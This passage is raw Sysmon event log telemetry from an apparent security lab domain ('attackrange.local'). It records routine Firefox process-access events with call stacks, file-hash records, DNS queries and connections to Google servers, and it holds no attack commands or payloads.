Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 10341000x8000000000000000105748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.769{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.755{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.754{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.754{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.746{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.746{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.745{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.745{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105740Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.256{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105739Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.218{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 10341000x8000000000000000105738Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.217{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 10341000x8000000000000000105737Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.216{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 10341000x8000000000000000105736Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.203{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105735Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.203{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105734Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.191{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105733Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.183{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000105732Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.120{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\protections.sqlite-journalMD5=C5FECC1DA0B42E4629536D096358215C,SHA256=62D2B8CAF80E1DB934BD828F605D3C74A0D510EFF0F50BB2AA6BA0C94E4DAE69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105731Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.106{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\protections.sqlite-journalMD5=65B1AFC21BFAB1AC19E15744EBD42390,SHA256=27CA472889807AC7DD00C5BBE3E0EB08AD4D751EC0DB396584E8757469F837B0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105730Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.074{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B428-615A-0D02-00000000FC01}6872C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2f710|C:\Program Files\Mozilla Firefox\xul.dll+e5ba99|C:\Program Files\Mozilla Firefox\xul.dll+e57449|C:\Program Files\Mozilla Firefox\xul.dll+e57eaf|C:\Program Files\Mozilla Firefox\xul.dll+e46dcd|C:\Program Files\Mozilla Firefox\xul.dll+40473d3|C:\Program Files\Mozilla Firefox\xul.dll+22a7511|C:\Program Files\Mozilla Firefox\xul.dll+9e8340|C:\Program Files\Mozilla Firefox\xul.dll+9ad911|C:\Program Files\Mozilla Firefox\xul.dll+1a043d|C:\Program Files\Mozilla Firefox\xul.dll+9eb417|C:\Program Files\Mozilla Firefox\xul.dll+9b5d19|C:\Program Files\Mozilla Firefox\xul.dll+9b8b41|C:\Program Files\Mozilla Firefox\xul.dll+9b790e|C:\Program Files\Mozilla Firefox\xul.dll+9b6c6e|C:\Program Files\Mozilla Firefox\xul.dll+9c0cf4|C:\Program Files\Mozilla Firefox\xul.dll+9076f4|C:\Program Files\Mozilla Firefox\xul.dll+8a6037|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f 354300x8000000000000000105810Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.911{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-56073-true2001:500:2d:0:0:0:0:d-53domain 354300x8000000000000000105809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.569{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local57974-false142.250.185.163fra16s51-in-f3.1e100.net443https 354300x8000000000000000105808Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.532{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local57973-false172.217.18.99zrh04s05-in-f99.1e100.net443https 23542300x8000000000000000105807Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.930{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CD4E622BF93C85BA5668DC299BCD17D,SHA256=742C4FEC279AEACA53449B683937F5523D5DD52966E42F5527E119A76B79E51A,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105806Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.478{58E9C193-B422-615A-0602-00000000FC01}5552gstaticadssl.l.google.com02a00:1450:4001:828::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105805Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.472{58E9C193-B422-615A-0602-00000000FC01}5552gstaticadssl.l.google.com0172.217.18.99;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000082889Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:39.593{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BD76478BE23826CEDD7792693D46DE3,SHA256=9510082C1BDA57938D0C6A8ADC7CD66EA2C706806F020B3B1C9F4364B1536E25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105804Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.444{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A19A9E265D3753E1E55C18BBF89B895,SHA256=A63AEE9E16FC3DE08FB3E13407005EE189501588DED50A3BF8139753F2A68A5B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105803Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.502{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51793-false142.250.186.163fra24s08-in-f3.1e100.net80http 354300x8000000000000000105802Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.470{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51792-false172.217.18.99zrh04s05-in-f99.1e100.net443https 354300x8000000000000000105801Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.468{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51791-false142.250.185.163fra16s51-in-f3.1e100.net443https 354300x8000000000000000105800Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.461{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63056- 354300x8000000000000000105799Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:38.459{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local61122- 10341000x8000000000000000105798Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.225{58E9C193-B422-615A-0602-00000000FC01}55524812C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a0b461|C:\Program Files\Mozilla Firefox\xul.dll+a6c6e5|C:\Program Files\Mozilla Firefox\xul.dll+d0281|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+1747b79|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+26742|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105797Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.209{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105796Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.208{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105795Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:39.202{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B42F-615A-0E02-00000000FC01}3376C:\Program Files\Mozilla 